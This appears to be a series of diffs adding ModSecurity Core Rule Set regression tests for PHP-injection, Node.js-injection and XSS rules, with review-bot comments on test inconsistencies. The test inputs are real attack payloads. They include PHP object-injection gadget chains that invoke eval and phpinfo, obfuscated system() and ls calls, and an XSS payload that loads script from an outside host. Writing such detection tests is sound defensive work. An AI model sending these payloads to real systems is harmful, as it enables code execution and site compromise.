dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=system%20something%28%29
output:
log_contains: id "933160"
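Review bot: Test 933160-21 sends `uri: ?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29` with no leading slash, so the request target is not a valid origin-form path and the server may reject it before the rule engine sees it. It should read `uri: /?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29`. Separately, every stage in this file also posts a body (`eval%0D%28%24foo%29` or `x=Print_r%28%20%29`). URIs that look like false-positive probes, such as `/?foo=ecosystem%28%29`, `/?foo=cheval%28%24foo%29` and `/?foo=the%20system%20is%20down%28%29`, therefore assert `log_contains: id "933160"`, and the match probably comes from the body rather than the URI. If those URIs are meant to be benign, they belong in stages without the body and with `no_log_contains: id "933160"`.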


@@ -0,0 +1,87 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933161.yaml
tests:
-
test_title: 933161-1
desc: regexp; must run test in PL3!
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?%20checkDate%28%29
output:
log_contains: id "933161"
-
test_title: 933161-2
desc: regexp; must run test in PL3!
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=chroot%09%28%29
output:
log_contains: id "933161"
-
test_title: 933161-3
desc: symlink \t()
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=chroot%09%28%29
output:
log_contains: id "933161"
-
test_title: 933161-4
desc: dl/*foo*/()
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=chroot%09%28%29
output:
log_contains: id "933161"
-
test_title: 933161-5
desc: dl/*foo*/()
stages:
- stage:
input:
data: gethostbynamE(
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /?foo=xucfirst%28%29
output:
no_log_contains: id "933161"


@@ -0,0 +1,163 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933170.yaml
tests:
-
test_title: 933170-1
desc: PHP object injection
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /serialize0?foo=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D
output:
log_contains: id "933170"
-
test_title: 933170-2
desc: PHP object injection
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /serialize1?foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
output:
log_contains: id "933170"
-
test_title: 933170-3
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize2
output:
log_contains: id "933170"
-
test_title: 933170-4
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize3?foo=O%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A2%3A%22fc%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A8%3A%22feed_url%22%3Bs%3A119%3A%22eval%28chr%28112%29.chr%28104%29.chr%28112%29.chr%28105%29.chr%28110%29.chr%28102%29.chr%28111%29.chr%2840%29.chr%2841%29.chr%2859%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%22%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A11%3A%22cache_class%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7D%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bb%3A1%3B%7D
output:
log_contains: id "933170"
-
test_title: 933170-5
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize4/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D
output:
log_contains: id "933170"
-
test_title: 933170-6
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize5?O%3A8%3A%22stdClass%22%3A4%3A%7Bs%3A3%3A%22aaa%22%3Ba%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2%3Bi%3A2%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Di%3A3%3Bi%3A4%3Bi%3A4%3Bi%3A5%3B%7Ds%3A3%3A%22aaa%22%3Bi%3A1%3Bs%3A3%3A%22ccc%22%3BR%3A5%3Bs%3A3%3A%22ddd%22%3Bs%3A4%3A%22AAAA%22%3B%7D
output:
log_contains: id "933170"
-
test_title: 933170-7
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize6
output:
log_contains: id "933170"
-
test_title: 933170-8
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize7
output:
log_contains: id "933170"
-
test_title: 933170-9
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize8
output:
log_contains: id "933170"
-
test_title: 933170-10
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize9
output:
log_contains: id "933170"


@@ -0,0 +1,530 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933180.yaml
tests:
-
test_title: 933180-1
desc: PHP variable functions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=
output:
no_log_contains: id "933180"
-
test_title: 933180-2
desc: $a(1)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24a%281%29'
output:
log_contains: id "933180"
-
test_title: 933180-3
desc: $$b(2)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24%24b%282%29'
output:
log_contains: id "933180"
-
test_title: 933180-4
desc: $_(3)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24_%283%29'
output:
log_contains: id "933180"
-
test_title: 933180-5
desc: '@$__[o](4)'
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%40%24__%5Bo%5D%284%29'
output:
log_contains: id "933180"
-
test_title: 933180-6
desc: $__['o'](5)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24__%5B%27o%27%5D%285%29'
output:
log_contains: id "933180"
-
test_title: 933180-7
desc: $__[@o](6)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24__%5B%40o%5D%286%29'
output:
log_contains: id "933180"
-
test_title: 933180-8
desc: $__[$_[1]](7)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24__%5B%24_%5B1%5D%5D%287%29'
output:
log_contains: id "933180"
-
test_title: 933180-9
desc: $__[@$c](8)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24__%5B%40%24c%5D%288%29'
output:
log_contains: id "933180"
-
test_title: 933180-10
desc: $d['o'](9)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: '%24d%5B%27o%27%5D%289%29'
output:
log_contains: id "933180"
-
test_title: 933180-11
desc: ${@a}(10)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24%7B%40a%7D%2810%29'
output:
log_contains: id "933180"
-
test_title: 933180-12
desc: ${'a'}(11)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?foo=%24%7B%27a%27%7D%2811%29'
output:
log_contains: id "933180"
-
test_title: 933180-13
desc: ${@$b}(12)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24%7B%40%24b%7D%2812%29'
output:
log_contains: id "933180"
-
test_title: 933180-14
desc: ${$s20}['q53b3a6'](13)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: '%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29'
output:
log_contains: id "933180"
-
test_title: 933180-15
desc: $GLOBALS['cf908275'](14)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24GLOBALS%5B%27cf908275%27%5D%2814%29'
output:
log_contains: id "933180"
-
test_title: 933180-16
desc: $OOO000000{0}(15)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'c=%24OOO000000%7B0%7D%2815%29'
output:
log_contains: id "933180"
-
test_title: 933180-17
desc: $OOO0000O0 (16)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24OOO0000O0%20%2816%29'
output:
log_contains: id "933180"
-
test_title: 933180-18
desc: $_aB_4c[5]['d'] /*lol*/ (17)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24_aB_4c%5B5%5D%5B%27d%27%5D%20%2F%2Alol%2A%2F%20%2817%29'
output:
log_contains: id "933180"
-
test_title: 933180-19
desc: $_aB_4c[@5]/*wat*/[@d] (18)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29'
output:
log_contains: id "933180"
-
test_title: 933180-20
desc: $_aB_4c/*foo*/[@5]/*bar*/[@d]/*baz*/(19)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'y=%24_aB_4c%2F%2Afoo%2A%2F%5B%405%5D%2F%2Abar%2A%2F%5B%40d%5D%2F%2Abaz%2A%2F%2819%29'
output:
log_contains: id "933180"
-
test_title: 933180-21
desc: $___[@-_](20)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24___%5B%40-_%5D%2820%29'
output:
log_contains: id "933180"
-
test_title: 933180-22
desc: '@$___[@!+_](21)'
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%40%24___%5B%40%21%2B_%5D%2821%29
output:
log_contains: id "933180"
-
test_title: 933180-23
desc: $b374k=@$s_func(22)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24b374k%3D%40%24s_func%2822%29'
output:
log_contains: id "933180"
-
test_title: 933180-24
desc: $function\r\n (23)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24function%0D%0A%20%2823%29'
output:
log_contains: id "933180"
-
test_title: 933180-25
desc: $__[_](24)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24__%5B_%5D%2824%29'
output:
log_contains: id "933180"
-
test_title: 933180-26
desc: $____[_]{_}[@_](25)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24____%5B_%5D%7B_%7D%5B%40_%5D%2825%29'
output:
log_contains: id "933180"
-
test_title: 933180-27
desc: multiline with comments
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: x=%24_aB_4c%20%23foo%0D%0A%09%5B5%5D%2F%2Fbar%0D%0A%09%5B%27d%27%5D%20%2F%2Afoo%2A%2F%20%2817%29
output:
log_contains: id "933180"
-
test_title: 933180-30
desc: $$$z(29)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24%24%24z%2829%29
output:
log_contains: id "933180"
-
test_title: 933180-31
desc: ${_.__}(30);
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24%7B_.__%7D%2830%29%3B
output:
log_contains: id "933180"
-
test_title: 933180-32
desc: $ {@_.__}(31);
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24%20%7B%40_.__%7D%2831%29%3B
output:
log_contains: id "933180"
-
test_title: 933180-33
desc: $_[@-_]($_[@!+_] )
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24_%5B%40-_%5D%28%24_%5B%40%21%2B_%5D%20%29
output:
log_contains: id "933180"
-
test_title: 933180-34
desc: $f(101).$f(120)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24f%28101%29.%24f%28120%29
output:
log_contains: id "933180"
-
test_title: 933180-35
desc: '@$b374k("foo")'
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%40%24b374k%28%22foo%22%29
output:
log_contains: id "933180"
-
test_title: 933180-36
desc: ${$foo->bar}(200)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24%7B%24foo-%3Ebar%7D%28200%29
output:
log_contains: id "933180"
-
test_title: 933180-37
desc: $foo->$funcname()
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: '%24foo-%3E%24funcname%28%29'
output:
log_contains: id "933180"
-
test_title: 933180-38
desc: Foo::$variable()
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=Foo%3A%3A%24variable%28%29
output:
log_contains: id "933180"
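Review bot: In 933180-19 the description and the payload disagree: `desc` shows `$_aB_4c[@5]/*wat*/[@d] (18)`, but the `data` value ends in `%20%28%29`, an empty argument list. Either send what is described, ending the value with `%20%2818%29`, or change the description to `$_aB_4c[@5]/*wat*/[@d] ()` so a failing run points at the real input. Separately, the cases that carry `data:` set no `method:` and so rely on the harness default; an explicit `method: POST` would make the request-body intent unambiguous. The meta `description: None` could name the rule, e.g. `description: "Tests for rule 933180 (PHP variable functions)"`.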


@@ -0,0 +1,245 @@
---
meta:
author: theMiddle
description: Test for "933210" PHP Variable Function bypass
enabled: true
name: 933210.yaml
tests:
-
test_title: 933210-1
desc: Check for false positive 1
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29.
output:
no_log_contains: id "933210"
-
test_title: 933210-2
desc: Check for false positive 2
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d
output:
no_log_contains: id "933210"
-
test_title: 933210-3
desc: PHP Variable Function bypass "(system)('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28system%29%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-4
desc: PHP Variable Function bypass "(sy.(st).em)('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28sy.%28st%29.em%29%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-5
desc: PHP Variable Function bypass "(string)'system'('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28string%29%22system%22%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-6
desc: PHP Variable Function bypass "( string ) 'sys'.'t'.'em' ('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-7
desc: PHP Variable Function bypass "(string) {[system][0]} ('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-8
desc: PHP Variable Function bypass "define('x', 'sys' . 'tem');(x)/* comment */('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-9
desc: PHP Variable Function bypass "$y = 'sys'.'tem';($y)('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-10
desc: PHP Variable Function bypass "define('z', [['sys' .'tem']]);(z)[0][0]('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-11
desc: PHP Variable Function bypass "(system)(ls)"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28system%29%28ls%29
output:
log_contains: id "933210"
-
test_title: 933210-12
desc: PHP Variable Function bypass "(/* comment */system)(ls/* comment */)"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29
output:
log_contains: id "933210"
-
test_title: 933210-13
desc: PHP Variable Function bypass "[system][0](ls)"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%5bsystem%5d%5b0%5d%28ls%29
output:
log_contains: id "933210"
-
test_title: 933210-14
desc: PHP Variable Function bypass "[ system ] [ 0 ] ( ls )"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29
output:
log_contains: id "933210"
-
test_title: 933210-15
desc: PHP Variable Function bypass "(['system'])[0]('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-16
desc: PHP Variable Function bypass "( [ system ][ 0 ]) {/* comment */0} ( ls )"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29
output:
log_contains: id "933210"
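Review bot: The descriptions of 933210-5 and 933210-6 show the function name in single quotes, but both `uri` values send `%22` (double quotes), so the form the description shows is never actually requested. Single-quoting the YAML scalar lets the text match the request, e.g. `desc: 'PHP Variable Function bypass (string)"system"(''uname'')'`. If the single-quoted variant is meant to be covered as well, it needs its own case using `%27system%27`. Whether rule 933210 matches that form cannot be told from this file.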


@@ -0,0 +1,151 @@
---
meta:
author: "lifeforms"
enabled: true
name: "934100.yaml"
description: "Tests for rule 934100"
tests:
-
test_title: 934100-0
desc: imported test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=_%24%24ND_FUNC%24%24_
version: HTTP/1.0
output:
log_contains: id "934100"
-
test_title: 934100-1
desc: imported test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=__js_function
version: HTTP/1.0
output:
log_contains: id "934100"
-
test_title: 934100-2
desc: imported test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=eval%28String.fromCharCode
version: HTTP/1.0
output:
log_contains: id "934100"
-
test_title: 934100-3
desc: imported test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=function%28%29+%7B
version: HTTP/1.0
output:
log_contains: id "934100"
-
test_title: 934100-4
desc: imported test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=new+Function+%28
version: HTTP/1.0
output:
log_contains: id "934100"
-
test_title: 934100-5
desc: imported test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=this.constructor.constructor
version: HTTP/1.0
output:
log_contains: id "934100"
-
test_title: 934100-6
desc: imported test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=module.exports%3D
version: HTTP/1.0
output:
log_contains: id "934100"
-
test_title: 934100-7
desc: base64 encoded test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=XyQkTkRfRlVOQyQkXwo=
version: HTTP/1.0
output:
log_contains: id "934100"
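Review bot: All eight cases in this file assert `log_contains`, so nothing here guards rule 934100 against false positives; a `no_log_contains` case with an ordinary value that mentions a word like `function` would pin that side. Seven of the descriptions read `imported test` and do not say which marker is being checked. Something like `desc: node-serialize marker _$$ND_FUNC$$_ in a query argument` for 934100-0 would make a failure readable. In 934100-7 the value `XyQkTkRfRlVOQyQkXwo=` decodes to the marker from 934100-0 plus a trailing newline, which is worth stating in its `desc` if it is intentional.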


@@ -0,0 +1,89 @@
---
meta:
author: "csanders-git"
enabled: true
name: "941100.yaml"
description: "Tests to trigger, or not trigger 941100"
tests:
-
test_title: 941100-1
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/demo/xss/xml/vuln.xml.php?input=<script+xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)</script>&//'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941100"
-
test_title: 941100-2
desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941100"
-
test_title: 941100-3
desc: XSS testing of libinjection in User-Agent
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: /
headers:
User-Agent: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E'
Host: localhost
output:
log_contains: id "941100"
-
test_title: 941100-4
desc: XSS testing of libinjection in User-Agent
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: /
headers:
User-Agent: ModSecurity CRS 3 Tests
Referer: http://www.cnn.com
Host: localhost
output:
no_log_contains: id "941100"
-
test_title: 941100-5FN
desc: XSS testing of libinjection in User-Agent
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: /
headers:
User-Agent: ModSecurity CRS 3 Tests
Referer: '/demo/xss/xml/vuln.xml.php?input=<script+xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)</script>&//'
Host: localhost
output:
no_log_contains: id "941100"
